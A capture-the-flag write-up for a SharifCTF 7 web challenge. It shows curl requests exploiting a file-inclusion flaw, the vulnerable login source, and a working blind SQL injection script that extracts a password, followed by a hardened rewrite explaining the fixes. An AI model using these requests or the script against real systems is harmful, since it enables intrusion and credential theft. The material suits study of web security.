# Irish Home (web 200)

The admin.php page was discovered with a small fuzzing run. admin.php was prone to an Execution After Redirect vulnerability: its redirect did not stop the script, so the page body was still served. That body revealed show.php, which takes a parameter named `page`, and show.php had a Local File Inclusion vulnerability. Because the `php://filter` wrapper returns the source base64-encoded instead of executing it, the PHP files could be read directly:

```sh
# curl http://ctf.sharif.edu:8082/pages/show.php?page=php://filter/convert.base64-encode/resource=../login
# curl http://ctf.sharif.edu:8082/pages/show.php?page=php://filter/convert.base64-encode/resource=../delete
# curl http://ctf.sharif.edu:8082/pages/show.php?page=php://filter/convert.base64-encode/resource=../deleted_3d5d9c1910e7c7/flag
```

delete.php
```html
<div style="text-align: center;">
  <h3 style="color: red;">Site is under maintenance 'til de end av dis f$#!*^% SharifCTF.</h3>

  <h4>Al' destructive acshuns are disabled!</h4>
</div>
```

login.php (the beginning of the file was lost in extraction; the listing starts inside the database connection check)
```php
connect_error) {
    die("Connection failed: " . $conn->connect_error);
}

// user input is concatenated straight into the query text
$sql = "SELECT * FROM users where username=\"$username\" and BINARY password=\"$password\"";

$result = $conn->query($sql);

if (!$result)
    trigger_error('Invalid query: ' . $conn->error);

if ($result->num_rows > 0) {
    // the quote check runs only after the query has already executed,
    // and its message differs from the normal failure text
    if(strpos($username, '"') !== false)
        $text = "SQL injection detected";
    else {
        $_SESSION['logged_in'] = $username;
        header('Location: /admin.php');   // no exit after the redirect
    }
}
$conn->close();
}
}
echo "

  • $text
";
}
?>

<form action="/login.php" method="POST">
  <div class="mdl-textfield mdl-js-textfield">
    <input class="mdl-textfield__input" type="text" id="username" name="username">
    <label class="mdl-textfield__label" for="username">Username</label>
  </div>

  <div class="mdl-textfield mdl-js-textfield">
    <input class="mdl-textfield__input" type="password" id="password" name="password">
    <label class="mdl-textfield__label" for="password">Password</label>
  </div>

  <div style="text-align: center;" class="mdl-textfield mdl-js-textfield">
    <button class="btn waves-effect waves-light" type="submit">Submit</button>
  </div>
</form>
```

Blind SQL injection script run against login.php (the beginning of the file, including the `customCurl` and `gPrint` helpers it calls, was lost in extraction; the listing starts at the tail of `customCurl`)
```php
    $headers, 'body'=>$body);
}

function getSpecificHeader($headers, $name){
    preg_match("#$name: *(.*)$#", $headers, $matches);

    return $matches[1];
}

// maps the two distinct login responses onto a boolean
function trueOrFalse($response){

    $trueValue = 'detected';
    $falseValue = 'seem to';

    if(strstr($response, $trueValue)!==false)
        return true;
    if(strstr($response, $falseValue)!==false)
        return false;

    return 'unknown';

}

// binary search over the ASCII range for the character at $pos
function getChar($pos, $lb=0, $ub=128) {
    $i = 0;
    while(++$i) {
        $M = floor($lb + ($ub-$lb)/2);
        if(injection('<', $pos, $M)==1) {
            $ub = $M - 1;
        }
        else if(injection('>', $pos, $M)==1) {
            $lb = $M + 1;
        }
        else
            return chr($M);
        if($lb > $ub)
            return -1;
    }
}

function injection($condition, $position, $char){
    $baseURL = 'http://ctf.sharif.edu:8082/login.php';

    //echo "Pos: $position, tryin char $condition $char\n";
    //password=admin&username=-1" or (select char_length(password) from users limit 0,1)>31 -- true
    //password=admin&username=-1" or (select char_length(password) from users limit 0,1)>32 -- false
    // length = 32

    $data = 'password=test&username=-1" or ascii(substring((select password from users limit 0,1),' . $position . ',1)) ' . $condition . $char . ' -- ';

    $response = customCurl($baseURL, $data, null, null, true);
    return trueOrFalse($response['body']);
}

$time_start = microtime(true);
$str = '';
$i = 1;
gPrint('So far: ', 0);
while(true){
    $char = getChar($i);
    if(ord($char)=='0') break;
    $str .= $char;
    echo $char;
    $i++;
}
$time_end = microtime(true);

//dividing by 60 gives the execution time in minutes, otherwise seconds
$execution_time = ($time_end - $time_start)/60;

//execution time of the script
echo "\n";
gPrint('Task has been finished.');
gPrint('Total Execution Time: '.(int)$execution_time.' Minute(s)');

?>
```
Password gathered: **2a7da9c@088ba43a_9c1b4Xbyd231eb9**. The flag was then generated from the password without further difficulty.
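The login.php above has two defects the script exploits: user input is concatenated into the SQL text and the `"` check runs only after the query, so the two different failure messages become a boolean oracle; and `header('Location: ...')` is not followed by `exit`, the same Execution After Redirect pattern found in admin.php. The hardened handler below is an added example, not code from the challenge or the original writeup; it assumes an open mysqli connection in `$conn` and keeps the original's plaintext, case-sensitive password comparison (a real deployment would store hashes and compare with `password_verify()`).

```php
<?php
// Added example (not the challenge's code). Assumes $conn is an open
// mysqli connection and that login.php is reached via POST.
session_start();

$username = $_POST['username'] ?? '';
$password = $_POST['password'] ?? '';

// 1. Parameterised query: the input is sent separately from the SQL text,
//    so a `"` or an appended condition can never change the statement.
//    BINARY keeps the case-sensitive comparison of the original query.
$stmt = $conn->prepare(
    'SELECT username FROM users WHERE username = ? AND BINARY password = ?'
);
if ($stmt === false) {
    // Log server-side; never echo $conn->error to the client.
    error_log('prepare failed: ' . $conn->error);
    http_response_code(500);
    exit;
}
$stmt->bind_param('ss', $username, $password);
$stmt->execute();
$stmt->store_result();
$matched = ($stmt->num_rows === 1);
$stmt->close();

// 2. One uniform failure message. The original answered "SQL injection
//    detected" only when the query returned rows, which is the single bit
//    the bisection script reads out one character at a time.
if (!$matched) {
    $text = 'Login failed';
} else {
    session_regenerate_id(true);
    $_SESSION['logged_in'] = $username;
    header('Location: /admin.php');
    // 3. Stop here. Without exit the rest of the page still runs and is
    //    sent to the client after the redirect header (Execution After
    //    Redirect), which is how admin.php's content leaked.
    exit;
}
?>
```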

https://twitter.com/yshahinzadeh

Original writeup (https://github.com/irGeeks/ctf/tree/master/2016-SharifCTF7/Web/Irish%20Home).